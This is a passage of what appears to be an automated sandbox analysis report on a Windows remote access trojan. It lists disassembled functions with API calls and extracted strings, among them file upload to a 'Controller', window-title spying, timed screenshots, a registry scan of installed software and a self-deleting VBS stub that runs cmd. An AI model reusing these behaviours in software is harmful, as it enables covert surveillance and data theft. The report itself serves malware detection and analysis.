                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                  • String ID: /stext "$0TG$0TG$NG$NG
                  • API String ID: 1223786279-2576077980
                  • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                  • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                  • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                  • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                  Function 0044F42D Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$EnvironmentVariable
                  • String ID:
                  • API String ID: 1464849758-0
                  • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                  • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                  • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                  • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                  Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                  • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                  • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                  • API String ID: 1332880857-3714951968
                  • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                  • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                  • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                  • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                  Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                  Download Yara Rule
                  APIs
                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                  • GetCursorPos.USER32(?), ref: 0041D5E9
                  • SetForegroundWindow.USER32(?), ref: 0041D5F2
                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                  • ExitProcess.KERNEL32 ref: 0041D665
                  • CreatePopupMenu.USER32 ref: 0041D66B
                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                  • String ID: Close
                  • API String ID: 1657328048-3535843008
                  • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                  • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                  • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                  • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                  Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$Info
                  • String ID:
                  • API String ID: 2509303402-0
                  • Opcode ID: 5869cf30a6bc76c96b91810e50649579c2b114ba446574e9e9616964d5930224
                  • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                  • Opcode Fuzzy Hash: 5869cf30a6bc76c96b91810e50649579c2b114ba446574e9e9616964d5930224
                  • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                  Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                  • __aulldiv.LIBCMT ref: 00408D4D
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                  • CloseHandle.KERNEL32(00000000), ref: 00408F64
                  • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                  • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                  • API String ID: 3086580692-2582957567
                  • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                  • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                  • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                  • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                  Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNEL32(00001388), ref: 0040A740
                    • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                    • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                    • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                    • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                  • API String ID: 3795512280-1152054767
                  • Opcode ID: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                  • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                  • Opcode Fuzzy Hash: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                  • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                  Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                  Download Yara Rule
                  APIs
                  • connect.WS2_32(?,?,?), ref: 004048E0
                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                  • WSAGetLastError.WS2_32 ref: 00404A21
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                  • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                  • API String ID: 994465650-3229884001
                  • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                  • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                  • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                  • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                  Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 0045130A
                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                  • _free.LIBCMT ref: 004512FF
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00451321
                  • _free.LIBCMT ref: 00451336
                  • _free.LIBCMT ref: 00451341
                  • _free.LIBCMT ref: 00451363
                  • _free.LIBCMT ref: 00451376
                  • _free.LIBCMT ref: 00451384
                  • _free.LIBCMT ref: 0045138F
                  • _free.LIBCMT ref: 004513C7
                  • _free.LIBCMT ref: 004513CE
                  • _free.LIBCMT ref: 004513EB
                  • _free.LIBCMT ref: 00451403
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                  • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                  • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                  Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00419FB9
                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                  • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                  • GetLocalTime.KERNEL32(?), ref: 0041A105
                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                  • API String ID: 489098229-1431523004
                  • Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                  • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                  • Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                  • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                  Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                    • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00413714
                    • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32 ref: 0041372D
                    • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                  • ExitProcess.KERNEL32 ref: 0040D9C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                  • API String ID: 1913171305-3159800282
                  • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                  • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                  • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                  • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                  Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                  • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                  • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                  • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                  Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                  • GetLastError.KERNEL32 ref: 00455CEF
                  • __dosmaperr.LIBCMT ref: 00455CF6
                  • GetFileType.KERNEL32 ref: 00455D02
                  • GetLastError.KERNEL32 ref: 00455D0C
                  • __dosmaperr.LIBCMT ref: 00455D15
                  • CloseHandle.KERNEL32(00000000), ref: 00455D35
                  • CloseHandle.KERNEL32(?), ref: 00455E7F
                  • GetLastError.KERNEL32 ref: 00455EB1
                  • __dosmaperr.LIBCMT ref: 00455EB8
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                  • String ID: H
                  • API String ID: 4237864984-2852464175
                  • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                  • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                  • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                  • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                  Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                  Download Yara Rule
                  APIs
                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                  • __alloca_probe_16.LIBCMT ref: 00453EEA
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                  • __alloca_probe_16.LIBCMT ref: 00453F94
                  • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                  • __freea.LIBCMT ref: 00454003
                  • __freea.LIBCMT ref: 0045400F
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                  • String ID: \@E
                  • API String ID: 201697637-1814623452
                  • Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                  • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                  • Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                  • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                  Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free
                  • String ID: \&G$\&G$`&G
                  • API String ID: 269201875-253610517
                  • Opcode ID: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                  • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                  • Opcode Fuzzy Hash: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                  • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                  Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 65535$udp
                  • API String ID: 0-1267037602
                  • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                  • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                  • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                  • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                  Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 0040AD38
                  • Sleep.KERNEL32(000001F4), ref: 0040AD43
                  • GetForegroundWindow.USER32 ref: 0040AD49
                  • GetWindowTextLengthW.USER32 ref: 0040AD52
                  • GetWindowTextW.USER32 ref: 0040AD86
                  • Sleep.KERNEL32(000003E8), ref: 0040AE54
                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                  • String ID: [${ User has been idle for $ minutes }$]
                  • API String ID: 911427763-3954389425
                  • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                  • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                  • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                  • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                  Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LongNamePath
                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                  • API String ID: 82841172-425784914
                  • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                  • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                  • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                  • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                  Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                  • __dosmaperr.LIBCMT ref: 0043A8A6
                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                  • __dosmaperr.LIBCMT ref: 0043A8E3
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                  • __dosmaperr.LIBCMT ref: 0043A937
                  • _free.LIBCMT ref: 0043A943
                  • _free.LIBCMT ref: 0043A94A
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                  • String ID:
                  • API String ID: 2441525078-0
                  • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                  • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                  • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                  • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                  Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                  • GetMessageA.USER32 ref: 0040556F
                  • TranslateMessage.USER32(?), ref: 0040557E
                  • DispatchMessageA.USER32 ref: 00405589
                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                  • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                  • String ID: CloseChat$DisplayMessage$GetMessage
                  • API String ID: 2956720200-749203953
                  • Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                  • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
